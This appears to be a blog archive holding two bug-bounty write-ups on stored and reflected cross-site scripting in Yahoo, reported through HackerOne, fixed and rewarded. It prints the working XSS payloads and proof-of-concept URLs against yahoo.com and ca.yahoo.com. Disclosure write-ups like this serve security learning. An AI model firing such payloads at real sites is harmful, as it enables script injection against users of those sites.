Showing posts with label XSS In Yahoo. Show all posts
Showing posts with label XSS In Yahoo. Show all posts

Stored XSS in Yahoo!


Sharing is Caring :)
When we share, we open doors to a new beginning...../
Well,  now I am going to share how I found Stored Cross-Site Scripting (XSS) in Yahoo.

Steps to Reproduce:
Comment this Payload:
"><img src=x onerror=confirm(1);&gt



Now what? Voila! We get the famous confirm(1) to a popup! :D

I am trying another payload that I can write something in the popup box, and found this payload: 
<img src=x onerror=prompt(1337)>

 That moment I feel like a boss! :P




Here is the video PoC:


Timeline:

31/03/2018 — Initial Report.
01/04/2018 — HackerOne staff asked for Needs more info.
01/04/2018 — More Info Submitted.
04/04/2018 — Triaged and a $300 initial bounty rewarded.
06/04/2018 — Bug Resolved.
11/04/2018 — Another $1700 bounty rewarded. (Total $2000)

Reflected XSS in yahoo.com

Hello Guys, This is Shahzada Al Shahriar Khan.
I am from Bangladesh. And I am Newbie in Bug Bounty. :P
Well, now I will share how I found Reflected Cross-Site Scripting (XSS) in the main & subdomain of Yahoo.

Vulnerable URLs:
https://www.yahoo.com/movies/film/[*]
https://ca.yahoo.com/movies/film/[*]

Payload:
"><%2fscript><script>alert(document.domain)<%2fscript>

PoC URL:
https://www.yahoo.com/movies/film/"><%2fscript><script>alert(document.domain)<%2fscript>
https://ca.yahoo.com/movies/film/"><%2fscript><script>alert(document.domain)<%2fscript>

PoC Screenshot:

Yahoo Canada Subdomain

Video PoC:



Timeline:
Aug 12th - I Submitted The Report.
Aug 15th - Triaged The Report & Rewarded Me a $300 Initial Bounty.
Aug 16th - Bug Resolved
Aug 24th - Another $400 Bounty Rewarded, Total Bounty is $700.